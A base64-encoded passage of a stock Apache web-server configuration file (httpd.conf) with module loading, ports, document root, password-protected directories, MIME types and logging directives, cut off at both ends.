Ywo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9EQVY+CkFkZE1vZHVsZSBtb2RfZGF2LmMKPC9J ZkRlZmluZT4KPElmRGVmaW5lIEhBVkVfUk9BTUlORz4KQWRkTW9kdWxlIG1vZF9yb2FtaW5nLmMK PC9JZkRlZmluZT4KPElmRGVmaW5lIEhBVkVfU1NMPgpBZGRNb2R1bGUgbW9kX3NzbC5jCjwvSWZE ZWZpbmU+CjxJZkRlZmluZSBIQVZFX1BVVD4KQWRkTW9kdWxlIG1vZF9wdXQuYwo8L0lmRGVmaW5l Pgo8SWZEZWZpbmUgSEFWRV9QWVRIT04+CkFkZE1vZHVsZSBtb2RfcHl0aG9uLmMKPC9JZkRlZmlu ZT4KCkFkZE1vZHVsZSBtb2RfbHhwLmMKCiMKIyBFeHRlbmRlZFN0YXR1cyBjb250cm9scyB3aGV0 aGVyIEFwYWNoZSB3aWxsIGdlbmVyYXRlICJmdWxsIiBzdGF0dXMKIyBpbmZvcm1hdGlvbiAoRXh0 ZW5kZWRTdGF0dXMgT24pIG9yIGp1c3QgYmFzaWMgaW5mb3JtYXRpb24gKEV4dGVuZGVkU3RhdHVz CiMgT2ZmKSB3aGVuIHRoZSAic2VydmVyLXN0YXR1cyIgaGFuZGxlciBpcyBjYWxsZWQuIFRoZSBk ZWZhdWx0IGlzIE9mZi4KIwojRXh0ZW5kZWRTdGF0dXMgT24KCiMjIyBTZWN0aW9uIDI6ICdNYWlu JyBzZXJ2ZXIgY29uZmlndXJhdGlvbgojCiMgVGhlIGRpcmVjdGl2ZXMgaW4gdGhpcyBzZWN0aW9u IHNldCB1cCB0aGUgdmFsdWVzIHVzZWQgYnkgdGhlICdtYWluJwojIHNlcnZlciwgd2hpY2ggcmVz cG9uZHMgdG8gYW55IHJlcXVlc3RzIHRoYXQgYXJlbid0IGhhbmRsZWQgYnkgYQojIDxWaXJ0dWFs SG9zdD4gZGVmaW5pdGlvbi4gIFRoZXNlIHZhbHVlcyBhbHNvIHByb3ZpZGUgZGVmYXVsdHMgZm9y CiMgYW55IDxWaXJ0dWFsSG9zdD4gY29udGFpbmVycyB5b3UgbWF5IGRlZmluZSBsYXRlciBpbiB0 aGUgZmlsZS4KIwojIEFsbCBvZiB0aGVzZSBkaXJlY3RpdmVzIG1heSBhcHBlYXIgaW5zaWRlIDxW aXJ0dWFsSG9zdD4gY29udGFpbmVycywKIyBpbiB3aGljaCBjYXNlIHRoZXNlIGRlZmF1bHQgc2V0 dGluZ3Mgd2lsbCBiZSBvdmVycmlkZGVuIGZvciB0aGUKIyB2aXJ0dWFsIGhvc3QgYmVpbmcgZGVm aW5lZC4KIwoKIwojIElmIHlvdXIgU2VydmVyVHlwZSBkaXJlY3RpdmUgKHNldCBlYXJsaWVyIGlu IHRoZSAnR2xvYmFsIEVudmlyb25tZW50JwojIHNlY3Rpb24pIGlzIHNldCB0byAiaW5ldGQiLCB0 aGUgbmV4dCBmZXcgZGlyZWN0aXZlcyBkb24ndCBoYXZlIGFueQojIGVmZmVjdCBzaW5jZSB0aGVp ciBzZXR0aW5ncyBhcmUgZGVmaW5lZCBieSB0aGUgaW5ldGQgY29uZmlndXJhdGlvbi4KIyBTa2lw IGFoZWFkIHRvIHRoZSBTZXJ2ZXJBZG1pbiBkaXJlY3RpdmUuCiMKCiMKIyBQb3J0OiBUaGUgcG9y dCB0byB3aGljaCB0aGUgc3RhbmRhbG9uZSBzZXJ2ZXIgbGlzdGVucy4gRm9yCiMgcG9ydHMgPCAx MDIzLCB5b3Ugd2lsbCBuZWVkIGh0dHBkIHRvIGJlIHJ1biBhcyByb290IGluaXRpYWxseS4KIwpQ b3J0IDgwCgojIwojIyAgU1NMIFN1cHBvcnQKIyMKIyMgIFdoZW4gd2UgYWxzbyBwcm92aWRlIFNT TCB3ZSBoYXZlIHRvIGxpc3RlbiB0byB0aGUgCiMjICBzdGFuZGFyZCBIVFRQIHBvcnQgKHNlZSBh Ym92ZSkgYW5kIHRvIHRoZSBIVFRQUyBwb3J0CiMjCjxJZkRlZmluZSBIQVZFX1NTTD4KTGlzdGVu IDgwCkxpc3RlbiA0NDMKPC9JZkRlZmluZT4KCiMKIyBJZiB5b3Ugd2lzaCBodHRwZCB0byBydW4g YXMgYSBkaWZmZXJlbnQgdXNlciBvciBncm91cCwgeW91IG11c3QgcnVuCiMgaHR0cGQgYXMgcm9v dCBpbml0aWFsbHkgYW5kIGl0IHdpbGwgc3dpdGNoLiAgCiMKIyBVc2VyL0dyb3VwOiBUaGUgbmFt ZSAob3IgI251bWJlcikgb2YgdGhlIHVzZXIvZ3JvdXAgdG8gcnVuIGh0dHBkIGFzLgojICAuIE9u IFNDTyAoT0RUIDMpIHVzZSAiVXNlciBub3VzZXIiIGFuZCAiR3JvdXAgbm9ncm91cCIuCiMgIC4g T24gSFBVWCB5b3UgbWF5IG5vdCBiZSBhYmxlIHRvIHVzZSBzaGFyZWQgbWVtb3J5IGFzIG5vYm9k eSwgYW5kIHRoZQojICAgIHN1Z2dlc3RlZCB3b3JrYXJvdW5kIGlzIHRvIGNyZWF0ZSBhIHVzZXIg d3d3IGFuZCB1c2UgdGhhdCB1c2VyLgojICBOT1RFIHRoYXQgc29tZSBrZXJuZWxzIHJlZnVzZSB0 byBzZXRnaWQoR3JvdXApIG9yIHNlbWN0bChJUENfU0VUKQojICB3aGVuIHRoZSB2YWx1ZSBvZiAo dW5zaWduZWQpR3JvdXAgaXMgYWJvdmUgNjAwMDA7IAojICBkb24ndCB1c2UgR3JvdXAgbm9ib2R5 IG9uIHRoZXNlIHN5c3RlbXMhCiMKVXNlciBhcGFjaGUKR3JvdXAgYXBhY2hlCgojCiMgU2VydmVy QWRtaW46IFlvdXIgYWRkcmVzcywgd2hlcmUgcHJvYmxlbXMgd2l0aCB0aGUgc2VydmVyIHNob3Vs ZCBiZQojIGUtbWFpbGVkLiAgVGhpcyBhZGRyZXNzIGFwcGVhcnMgb24gc29tZSBzZXJ2ZXItZ2Vu ZXJhdGVkIHBhZ2VzLCBzdWNoCiMgYXMgZXJyb3IgZG9jdW1lbnRzLgojClNlcnZlckFkbWluIHJv b3RAbG9jYWxob3N0CgojCiMgU2VydmVyTmFtZSBhbGxvd3MgeW91IHRvIHNldCBhIGhvc3QgbmFt ZSB3aGljaCBpcyBzZW50IGJhY2sgdG8gY2xpZW50cyBmb3IKIyB5b3VyIHNlcnZlciBpZiBpdCdz IGRpZmZlcmVudCB0aGFuIHRoZSBvbmUgdGhlIHByb2dyYW0gd291bGQgZ2V0IChpLmUuLCB1c2UK IyAid3d3IiBpbnN0ZWFkIG9mIHRoZSBob3N0J3MgcmVhbCBuYW1lKS4KIwojIE5vdGU6IFlvdSBj YW5ub3QganVzdCBpbnZlbnQgaG9zdCBuYW1lcyBhbmQgaG9wZSB0aGV5IHdvcmsuIFRoZSBuYW1l IHlvdSAKIyBkZWZpbmUgaGVyZSBtdXN0IGJlIGEgdmFsaWQgRE5TIG5hbWUgZm9yIHlvdXIgaG9z dC4gSWYgeW91IGRvbid0IHVuZGVyc3RhbmQKIyB0aGlzLCBhc2sgeW91ciBuZXR3b3JrIGFkbWlu aXN0cmF0b3IuCiMgSWYgeW91ciBob3N0IGRvZXNuJ3QgaGF2ZSBhIHJlZ2lzdGVyZWQgRE5TIG5h bWUsIGVudGVyIGl0cyBJUCBhZGRyZXNzIGhlcmUuCiMgWW91IHdpbGwgaGF2ZSB0byBhY2Nlc3Mg aXQgYnkgaXRzIGFkZHJlc3MgKGUuZy4sIGh0dHA6Ly8xMjMuNDUuNjcuODkvKQojIGFueXdheSwg YW5kIHRoaXMgd2lsbCBtYWtlIHJlZGlyZWN0aW9ucyB3b3JrIGluIGEgc2Vuc2libGUgd2F5Lgoj CiMgMTI3LjAuMC4xIGlzIHRoZSBUQ1AvSVAgbG9jYWwgbG9vcC1iYWNrIGFkZHJlc3MsIG9mdGVu IG5hbWVkIGxvY2FsaG9zdC4gWW91ciAKIyBtYWNoaW5lIGFsd2F5cyBrbm93cyBpdHNlbGYgYnkg dGhpcyBhZGRyZXNzLiBJZiB5b3UgdXNlIEFwYWNoZSBzdHJpY3RseSBmb3IgCiMgbG9jYWwgdGVz dGluZyBhbmQgZGV2ZWxvcG1lbnQsIHlvdSBtYXkgdXNlIDEyNy4wLjAuMSBhcyB0aGUgc2VydmVy IG5hbWUuCiMKI1NlcnZlck5hbWUgbG9jYWxob3N0CgojCiMgRG9jdW1lbnRSb290OiBUaGUgZGly ZWN0b3J5IG91dCBvZiB3aGljaCB5b3Ugd2lsbCBzZXJ2ZSB5b3VyCiMgZG9jdW1lbnRzLiBCeSBk ZWZhdWx0LCBhbGwgcmVxdWVzdHMgYXJlIHRha2VuIGZyb20gdGhpcyBkaXJlY3RvcnksIGJ1dAoj IHN5bWJvbGljIGxpbmtzIGFuZCBhbGlhc2VzIG1heSBiZSB1c2VkIHRvIHBvaW50IHRvIG90aGVy IGxvY2F0aW9ucy4KIwpEb2N1bWVudFJvb3QgIi92YXIvd3d3L2h0bWwiCgojCiMgRWFjaCBkaXJl Y3RvcnkgdG8gd2hpY2ggQXBhY2hlIGhhcyBhY2Nlc3MsIGNhbiBiZSBjb25maWd1cmVkIHdpdGgg cmVzcGVjdAojIHRvIHdoaWNoIHNlcnZpY2VzIGFuZCBmZWF0dXJlcyBhcmUgYWxsb3dlZCBhbmQv b3IgZGlzYWJsZWQgaW4gdGhhdAojIGRpcmVjdG9yeSAoYW5kIGl0cyBzdWJkaXJlY3Rvcmllcyku IAojCiMgRmlyc3QsIHdlIGNvbmZpZ3VyZSB0aGUgImRlZmF1bHQiIHRvIGJlIGEgdmVyeSByZXN0 cmljdGl2ZSBzZXQgb2YgCiMgcGVybWlzc2lvbnMuICAKIwo8RGlyZWN0b3J5IC8+CiAgICBPcHRp b25zIEZvbGxvd1N5bUxpbmtzCiAgICBBbGxvd092ZXJyaWRlIE5vbmUKPC9EaXJlY3Rvcnk+Cgoj CiMgTm90ZSB0aGF0IGZyb20gdGhpcyBwb2ludCBmb3J3YXJkIHlvdSBtdXN0IHNwZWNpZmljYWxs eSBhbGxvdwojIHBhcnRpY3VsYXIgZmVhdHVyZXMgdG8gYmUgZW5hYmxlZCAtIHNvIGlmIHNvbWV0 aGluZydzIG5vdCB3b3JraW5nIGFzCiMgeW91IG1pZ2h0IGV4cGVjdCwgbWFrZSBzdXJlIHRoYXQg eW91IGhhdmUgc3BlY2lmaWNhbGx5IGVuYWJsZWQgaXQKIyBiZWxvdy4KIwoKIwojIFRoaXMgc2hv dWxkIGJlIGNoYW5nZWQgdG8gd2hhdGV2ZXIgeW91IHNldCBEb2N1bWVudFJvb3QgdG8uCiMKPERp cmVjdG9yeSAiL3Zhci93d3cvaHRtbCI+CgojCiMgVGhpcyBtYXkgYWxzbyBiZSAiTm9uZSIsICJB bGwiLCBvciBhbnkgY29tYmluYXRpb24gb2YgIkluZGV4ZXMiLAojICJJbmNsdWRlcyIsICJGb2xs b3dTeW1MaW5rcyIsICJFeGVjQ0dJIiwgb3IgIk11bHRpVmlld3MiLgojCiMgTm90ZSB0aGF0ICJN dWx0aVZpZXdzIiBtdXN0IGJlIG5hbWVkICpleHBsaWNpdGx5KiAtLS0gIk9wdGlvbnMgQWxsIgoj IGRvZXNuJ3QgZ2l2ZSBpdCB0byB5b3UuCiMKICAgIE9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1M aW5rcwoKIwojIFRoaXMgY29udHJvbHMgd2hpY2ggb3B0aW9ucyB0aGUgLmh0YWNjZXNzIGZpbGVz IGluIGRpcmVjdG9yaWVzIGNhbgojIG92ZXJyaWRlLiBDYW4gYWxzbyBiZSAiQWxsIiwgb3IgYW55 IGNvbWJpbmF0aW9uIG9mICJPcHRpb25zIiwgIkZpbGVJbmZvIiwgCiMgIkF1dGhDb25maWciLCBh bmQgIkxpbWl0IgojCiAgICBBbGxvd092ZXJyaWRlIE5vbmUKCiMKIyBDb250cm9scyB3aG8gY2Fu IGdldCBzdHVmZiBmcm9tIHRoaXMgc2VydmVyLgojCiAgICBPcmRlciBhbGxvdyxkZW55CiAgICBB bGxvdyBmcm9tIGFsbAo8L0RpcmVjdG9yeT4KCgo8RGlyZWN0b3J5IC92YXIvd3d3L2h0bWwvZ2lt cy8gPgoKQXV0aFVzZXJGaWxlIC9ldGMvaHR0cGQvY29uZi8uaHRwYXNzd2QKQXV0aEdyb3VwRmls ZSAvZXRjL2h0dHBkL2NvbmYvLmh0Z3JvdXAKQXV0aE5hbWUgIEdJTVNfT05FCkF1dGhUeXBlIEJh c2ljCgo8TGltaXQgR0VUPgoKcmVxdWlyZSBncm91cCBnaW1zCgo8L0xpbWl0PgoKIyBFcnJvckRv Y3VtZW50IDQwMSAvcGhvdG9zLwoKPC9EaXJlY3Rvcnk+CgoKCjxEaXJlY3RvcnkgL3Zhci93d3cv aHRtbC9naW1zMi8gPgoKQXV0aFVzZXJGaWxlIC9ldGMvaHR0cGQvY29uZi8uaHRwYXNzd2QKQXV0 aEdyb3VwRmlsZSAvZXRjL2h0dHBkL2NvbmYvLmh0Z3JvdXAKQXV0aE5hbWUgIEdJTVNfREVWRUxP UE1FTlQKQXV0aFR5cGUgQmFzaWMKCjxMaW1pdCBHRVQ+CgpyZXF1aXJlIGdyb3VwIGdpbXNfZGV2 Cgo8L0xpbWl0PgoKIyBFcnJvckRvY3VtZW50IDQwMSAvcGhvdG9zLwoKPC9EaXJlY3Rvcnk+CgoK CiMKIyBVc2VyRGlyOiBUaGUgbmFtZSBvZiB0aGUgZGlyZWN0b3J5IHdoaWNoIGlzIGFwcGVuZGVk IG9udG8gYSB1c2VyJ3MgaG9tZQojIGRpcmVjdG9yeSBpZiBhIH51c2VyIHJlcXVlc3QgaXMgcmVj ZWl2ZWQuCiMKIyBUaGUgcGF0aCB0byB0aGUgZW5kIHVzZXIgYWNjb3VudCAncHVibGljX2h0bWwn IGRpcmVjdG9yeSBtdXN0IGJlCiMgYWNjZXNzaWJsZSB0byB0aGUgd2Vic2VydmVyIHVzZXJpZC4g IFRoaXMgdXN1YWxseSBtZWFucyB0aGF0IH51c2VyaWQKIyBtdXN0IGhhdmUgcGVybWlzc2lvbnMg b2YgNzExLCB+dXNlcmlkL3B1YmxpY19odG1sIG11c3QgaGF2ZSBwZXJtaXNzaW9ucwojIG9mIDc1 NSwgYW5kIGRvY3VtZW50cyBjb250YWluZWQgdGhlcmVpbiBtdXN0IGJlIHdvcmxkLXJlYWRhYmxl LgojIE90aGVyd2lzZSwgdGhlIGNsaWVudCB3aWxsIG9ubHkgcmVjZWl2ZSBhICI0MDMgRm9yYmlk ZGVuIiBtZXNzYWdlLgojCiMgU2VlIGFsc286IGh0dHA6Ly9odHRwZC5hcGFjaGUub3JnL2RvY3Mv bWlzYy9GQVEuaHRtbCNmb3JiaWRkZW4KIwo8SWZNb2R1bGUgbW9kX3VzZXJkaXIuYz4KICAgIFVz ZXJEaXIgcHVibGljX2h0bWwKPC9JZk1vZHVsZT4KCiMKIyBDb250cm9sIGFjY2VzcyB0byBVc2Vy RGlyIGRpcmVjdG9yaWVzLiAgVGhlIGZvbGxvd2luZyBpcyBhbiBleGFtcGxlCiMgZm9yIGEgc2l0 ZSB3aGVyZSB0aGVzZSBkaXJlY3RvcmllcyBhcmUgcmVzdHJpY3RlZCB0byByZWFkLW9ubHkuCiMK IzxEaXJlY3RvcnkgL2hvbWUvKi9wdWJsaWNfaHRtbD4KIyAgICBBbGxvd092ZXJyaWRlIEZpbGVJ bmZvIEF1dGhDb25maWcgTGltaXQKIyAgICBPcHRpb25zIE11bHRpVmlld3MgSW5kZXhlcyBTeW1M aW5rc0lmT3duZXJNYXRjaCBJbmNsdWRlc05vRXhlYwojICAgIDxMaW1pdCBHRVQgUE9TVCBPUFRJ T05TIFBST1BGSU5EPgojICAgICAgICBPcmRlciBhbGxvdyxkZW55CiMgICAgICAgIEFsbG93IGZy b20gYWxsCiMgICAgPC9MaW1pdD4KIyAgICA8TGltaXRFeGNlcHQgR0VUIFBPU1QgT1BUSU9OUyBQ Uk9QRklORD4KIyAgICAgICAgT3JkZXIgZGVueSxhbGxvdwojICAgICAgICBEZW55IGZyb20gYWxs CiMgICAgPC9MaW1pdEV4Y2VwdD4KIzwvRGlyZWN0b3J5PgoKIwojIERpcmVjdG9yeUluZGV4OiBO YW1lIG9mIHRoZSBmaWxlIG9yIGZpbGVzIHRvIHVzZSBhcyBhIHByZS13cml0dGVuIEhUTUwKIyBk aXJlY3RvcnkgaW5kZXguICBTZXBhcmF0ZSBtdWx0aXBsZSBlbnRyaWVzIHdpdGggc3BhY2VzLgoj CjxJZk1vZHVsZSBtb2RfZGlyLmM+CiAgICBEaXJlY3RvcnlJbmRleCBpbmRleC5odG1sIGluZGV4 Lmh0bSBpbmRleC5zaHRtbCBpbmRleC5waHAgaW5kZXgucGhwNCBpbmRleC5waHAzIGluZGV4LnBo dG1sIGluZGV4LmNnaSBpbmRleC5seHAKPC9JZk1vZHVsZT4KCiMKIyBBY2Nlc3NGaWxlTmFtZTog VGhlIG5hbWUgb2YgdGhlIGZpbGUgdG8gbG9vayBmb3IgaW4gZWFjaCBkaXJlY3RvcnkKIyBmb3Ig YWNjZXNzIGNvbnRyb2wgaW5mb3JtYXRpb24uCiMKQWNjZXNzRmlsZU5hbWUgLmh0YWNjZXNzCgoj CiMgVGhlIGZvbGxvd2luZyBsaW5lcyBwcmV2ZW50IC5odGFjY2VzcyBmaWxlcyBmcm9tIGJlaW5n IHZpZXdlZCBieQojIFdlYiBjbGllbnRzLiAgU2luY2UgLmh0YWNjZXNzIGZpbGVzIG9mdGVuIGNv bnRhaW4gYXV0aG9yaXphdGlvbgojIGluZm9ybWF0aW9uLCBhY2Nlc3MgaXMgZGlzYWxsb3dlZCBm b3Igc2VjdXJpdHkgcmVhc29ucy4gIENvbW1lbnQKIyB0aGVzZSBsaW5lcyBvdXQgaWYgeW91IHdh bnQgV2ViIHZpc2l0b3JzIHRvIHNlZSB0aGUgY29udGVudHMgb2YKIyAuaHRhY2Nlc3MgZmlsZXMu ICBJZiB5b3UgY2hhbmdlIHRoZSBBY2Nlc3NGaWxlTmFtZSBkaXJlY3RpdmUgYWJvdmUsCiMgYmUg c3VyZSB0byBtYWtlIHRoZSBjb3JyZXNwb25kaW5nIGNoYW5nZXMgaGVyZS4KIwojIEFsc28sIGZv bGtzIHRlbmQgdG8gdXNlIG5hbWVzIHN1Y2ggYXMgLmh0cGFzc3dkIGZvciBwYXNzd29yZAojIGZp bGVzLCBzbyB0aGlzIHdpbGwgcHJvdGVjdCB0aG9zZSBhcyB3ZWxsLgojCjxGaWxlcyB+ICJeXC5o dCI+CiAgICBPcmRlciBhbGxvdyxkZW55CiAgICBEZW55IGZyb20gYWxsCjwvRmlsZXM+CgojCiMg Q2FjaGVOZWdvdGlhdGVkRG9jczogQnkgZGVmYXVsdCwgQXBhY2hlIHNlbmRzICJQcmFnbWE6IG5v LWNhY2hlIiB3aXRoIGVhY2gKIyBkb2N1bWVudCB0aGF0IHdhcyBuZWdvdGlhdGVkIG9uIHRoZSBi YXNpcyBvZiBjb250ZW50LiBUaGlzIGFza3MgcHJveHkKIyBzZXJ2ZXJzIG5vdCB0byBjYWNoZSB0 aGUgZG9jdW1lbnQuIFVuY29tbWVudGluZyB0aGUgZm9sbG93aW5nIGxpbmUgZGlzYWJsZXMKIyB0 aGlzIGJlaGF2aW9yLCBhbmQgcHJveGllcyB3aWxsIGJlIGFsbG93ZWQgdG8gY2FjaGUgdGhlIGRv Y3VtZW50cy4KIwojQ2FjaGVOZWdvdGlhdGVkRG9jcwoKIwojIFVzZUNhbm9uaWNhbE5hbWU6ICAo bmV3IGZvciAxLjMpICBXaXRoIHRoaXMgc2V0dGluZyB0dXJuZWQgb24sIHdoZW5ldmVyCiMgQXBh Y2hlIG5lZWRzIHRvIGNvbnN0cnVjdCBhIHNlbGYtcmVmZXJlbmNpbmcgVVJMIChhIFVSTCB0aGF0 IHJlZmVycyBiYWNrCiMgdG8gdGhlIHNlcnZlciB0aGUgcmVzcG9uc2UgaXMgY29taW5nIGZyb20p IGl0IHdpbGwgdXNlIFNlcnZlck5hbWUgYW5kCiMgUG9ydCB0byBmb3JtIGEgImNhbm9uaWNhbCIg bmFtZS4gIFdpdGggdGhpcyBzZXR0aW5nIG9mZiwgQXBhY2hlIHdpbGwKIyB1c2UgdGhlIGhvc3Ru YW1lOnBvcnQgdGhhdCB0aGUgY2xpZW50IHN1cHBsaWVkLCB3aGVuIHBvc3NpYmxlLiAgVGhpcwoj IGFsc28gYWZmZWN0cyBTRVJWRVJfTkFNRSBhbmQgU0VSVkVSX1BPUlQgaW4gQ0dJIHNjcmlwdHMu CiMKVXNlQ2Fub25pY2FsTmFtZSBPbgoKIwojIFR5cGVzQ29uZmlnIGRlc2NyaWJlcyB3aGVyZSB0 aGUgbWltZS50eXBlcyBmaWxlIChvciBlcXVpdmFsZW50KSBpcwojIHRvIGJlIGZvdW5kLgojCjxJ Zk1vZHVsZSBtb2RfbWltZS5jPgogICAgVHlwZXNDb25maWcgL2V0Yy9taW1lLnR5cGVzCjwvSWZN b2R1bGU+CgojCiMgRGVmYXVsdFR5cGUgaXMgdGhlIGRlZmF1bHQgTUlNRSB0eXBlIHRoZSBzZXJ2 ZXIgd2lsbCB1c2UgZm9yIGEgZG9jdW1lbnQKIyBpZiBpdCBjYW5ub3Qgb3RoZXJ3aXNlIGRldGVy bWluZSBvbmUsIHN1Y2ggYXMgZnJvbSBmaWxlbmFtZSBleHRlbnNpb25zLgojIElmIHlvdXIgc2Vy dmVyIGNvbnRhaW5zIG1vc3RseSB0ZXh0IG9yIEhUTUwgZG9jdW1lbnRzLCAidGV4dC9wbGFpbiIg aXMKIyBhIGdvb2QgdmFsdWUuICBJZiBtb3N0IG9mIHlvdXIgY29udGVudCBpcyBiaW5hcnksIHN1 Y2ggYXMgYXBwbGljYXRpb25zCiMgb3IgaW1hZ2VzLCB5b3UgbWF5IHdhbnQgdG8gdXNlICJhcHBs aWNhdGlvbi9vY3RldC1zdHJlYW0iIGluc3RlYWQgdG8KIyBrZWVwIGJyb3dzZXJzIGZyb20gdHJ5 aW5nIHRvIGRpc3BsYXkgYmluYXJ5IGZpbGVzIGFzIHRob3VnaCB0aGV5IGFyZQojIHRleHQuCiMK RGVmYXVsdFR5cGUgdGV4dC9wbGFpbgoKIwojIFRoZSBtb2RfbWltZV9tYWdpYyBtb2R1bGUgYWxs b3dzIHRoZSBzZXJ2ZXIgdG8gdXNlIHZhcmlvdXMgaGludHMgZnJvbSB0aGUKIyBjb250ZW50cyBv ZiB0aGUgZmlsZSBpdHNlbGYgdG8gZGV0ZXJtaW5lIGl0cyB0eXBlLiAgVGhlIE1JTUVNYWdpY0Zp bGUKIyBkaXJlY3RpdmUgdGVsbHMgdGhlIG1vZHVsZSB3aGVyZSB0aGUgaGludCBkZWZpbml0aW9u cyBhcmUgbG9jYXRlZC4KIyBtb2RfbWltZV9tYWdpYyBpcyBub3QgcGFydCBvZiB0aGUgZGVmYXVs dCBzZXJ2ZXIgKHlvdSBoYXZlIHRvIGFkZAojIGl0IHlvdXJzZWxmIHdpdGggYSBMb2FkTW9kdWxl IFtzZWUgdGhlIERTTyBwYXJhZ3JhcGggaW4gdGhlICdHbG9iYWwKIyBFbnZpcm9ubWVudCcgc2Vj dGlvbl0sIG9yIHJlY29tcGlsZSB0aGUgc2VydmVyIGFuZCBpbmNsdWRlIG1vZF9taW1lX21hZ2lj CiMgYXMgcGFydCBvZiB0aGUgY29uZmlndXJhdGlvbiksIHNvIGl0J3MgZW5jbG9zZWQgaW4gYW4g PElmTW9kdWxlPiBjb250YWluZXIuCiMgVGhpcyBtZWFucyB0aGF0IHRoZSBNSU1FTWFnaWNGaWxl IGRpcmVjdGl2ZSB3aWxsIG9ubHkgYmUgcHJvY2Vzc2VkIGlmIHRoZQojIG1vZHVsZSBpcyBwYXJ0 IG9mIHRoZSBzZXJ2ZXIuCiMKPElmTW9kdWxlIG1vZF9taW1lX21hZ2ljLmM+CiMgICBNSU1FTWFn aWNGaWxlIC91c3Ivc2hhcmUvbWFnaWMubWltZQogICAgTUlNRU1hZ2ljRmlsZSBjb25mL21hZ2lj CjwvSWZNb2R1bGU+CgojCiMgSG9zdG5hbWVMb29rdXBzOiBMb2cgdGhlIG5hbWVzIG9mIGNsaWVu dHMgb3IganVzdCB0aGVpciBJUCBhZGRyZXNzZXMKIyBlLmcuLCB3d3cuYXBhY2hlLm9yZyAob24p IG9yIDIwNC42Mi4xMjkuMTMyIChvZmYpLgojIFRoZSBkZWZhdWx0IGlzIG9mZiBiZWNhdXNlIGl0 J2QgYmUgb3ZlcmFsbCBiZXR0ZXIgZm9yIHRoZSBuZXQgaWYgcGVvcGxlCiMgaGFkIHRvIGtub3dp bmdseSB0dXJuIHRoaXMgZmVhdHVyZSBvbiwgc2luY2UgZW5hYmxpbmcgaXQgbWVhbnMgdGhhdAoj IGVhY2ggY2xpZW50IHJlcXVlc3Qgd2lsbCByZXN1bHQgaW4gQVQgTEVBU1Qgb25lIGxvb2t1cCBy ZXF1ZXN0IHRvIHRoZQojIG5hbWVzZXJ2ZXIuCiMKSG9zdG5hbWVMb29rdXBzIE9mZgoKIwojIEVy cm9yTG9nOiBUaGUgbG9jYXRpb24gb2YgdGhlIGVycm9yIGxvZyBmaWxlLgojIElmIHlvdSBkbyBu b3Qgc3BlY2lmeSBhbiBFcnJvckxvZyBkaXJlY3RpdmUgd2l0aGluIGEgPFZpcnR1YWxIb3N0Pgoj IGNvbnRhaW5lciwgZXJyb3IgbWVzc2FnZXMgcmVsYXRpbmcgdG8gdGhhdCB2aXJ0dWFsIGhvc3Qg d2lsbCBiZQojIGxvZ2dlZCBoZXJlLiAgSWYgeW91ICpkbyogZGVmaW5lIGFuIGVycm9yIGxvZ2Zp bGUgZm9yIGEgPFZpcnR1YWxIb3N0PgojIGNvbnRhaW5lciwgdGhhdCBob3N0J3MgZXJyb3JzIHdp bGwgYmUgbG9nZ2VkIHRoZXJlIGFuZCBub3QgaGVyZS4KIwpFcnJvckxvZyBsb2dzL2Vycm9yX2xv ZwoKIwojIExvZ0xldmVsOiBDb250cm9sIHRoZSBudW1iZXIgb2YgbWVzc2FnZXMgbG9nZ2VkIHRv IHRoZSBlcnJvcl9sb2cuCiMgUG9zc2libGUgdmFsdWVzIGluY2x1ZGU6IGRlYnVnLCBpbmZvLCBu b3RpY2UsIHdhcm4sIGVycm9yLCBjcml0LAojIGFsZXJ0LCBlbWVyZy4KIwpMb2dMZXZlbCB3YXJu CgojCiMgVGhlIGZvbGxvd2luZyBkaXJlY3RpdmVzIGRlZmluZSBzb21lIGZvcm1hdCBuaWNrbmFt ZXMgZm9yIHVzZSB3aXRoCiMgYSBDdXN0b21Mb2cgZGlyZWN0aXZlIChzZWUgYmVsb3cpLgojCkxv Z0Zvcm1hdCAiJWggJWwgJXUgJXQgXCIlclwiICU+cyAlYiBcIiV7UmVmZXJlcn1pXCIgXCIle1Vz ZXItQWdlbnR9aVwiIiBjb21iaW5lZApMb2dGb3JtYXQgIiVoICVsICV1ICV0IFwiJXJcIiAlPnMg JWIiIGNvbW1vbgpMb2dGb3JtYXQgIiV7UmVmZXJlcn1pIC0+ICVVIiByZWZlcmVyCkxvZ0Zvcm1h dCAiJXtVc2VyLWFnZW50fWkiIGFnZW50CgojCiMgVGhlIGxvY2F0aW9uIGFuZCBmb3JtYXQgb2Yg dGhlIGFjY2VzcyBsb2dmaWxlIChDb21tb24gTG9nZmlsZSBGb3JtYXQpLgojIElmIHlvdSBkbyBu b3QgZGVmaW5lIGFueSBhY2Nlc3MgbG9nZmlsZXMgd2l0aGluIGEgPFZpcnR1YWxIb3N0PgojIGNv bnRhaW5lciwgdGhleSB3aWxsIGJlIGxvZ2dlZCBoZXJlLiAgQ29udHJhcml3aXNlLCBpZiB5b3Ug KmRvKgojIGRlZmluZSBwZXItPFZpcnR1YWxIb3N0PiBhY2Nlc3MgbG9nZmlsZXMsIHRyYW5zYWN0 aW9ucyB3aWxsIGJlCiMgbG9nZ2VkIHRoZXJlaW4gYW5kICpub3QqIGluIHRoaXMgZmlsZS4KIwoj IEN1c3RvbUxvZyAvdmFyL2xvZy9odHRwZC9hY2Nlc3NfbG9nIGNvbW1vbgpDdXN0b21Mb2cgbG9n cy9hY2Nlc3NfbG9nIGNvbWJpbmVkCgojCiMgSWYgeW91IHdvdWxkIGxpa2UgdG8gaGF2ZSBhZ2Vu dCBhbmQgcmVmZXJlciBsb2dmaWxlcywgdW5jb21tZW50IHRoZQojIGZvbGxvd2luZyBkaXJlY3Rp dmVzLgojCiNDdXN0b21Mb2cgbG9ncy9yZWZlcmVyX2xvZyByZWZlcmVyCiNDdXN0b21Mb2cgbG9n cy9hZ2VudF9sb2cgYWdlbnQKCiMKIyBJZiB5b3UgcHJlZmVyIGEgc2luZ2xlIGxvZ2ZpbGUgd2l0 aCBhY2Nlc3MsIGFnZW50LCBhbmQgcmVmZXJlciBpbmZvcm1hdGlvbgojIChDb21iaW5lZCBMb2dm aWxlIEZvcm1hdCkgeW91IGNhbiB1c2UgdGhlIGZvbGxvd2luZyBkaXJlY3RpdmUuCiMKI0N1c3Rv bUxvZyBsb2dzL2FjY2Vzc19sb2cgY29tYmluZWQKCiMKIyBPcHRpb25hbGx5IGFkZCBhIGxpbmUg Y29udGFpbmluZyB0aGUgc2VydmVyIHZlcnNpb24gYW5kIHZpcnR1YWwgaG9zdAojIG5hbWUgdG8g 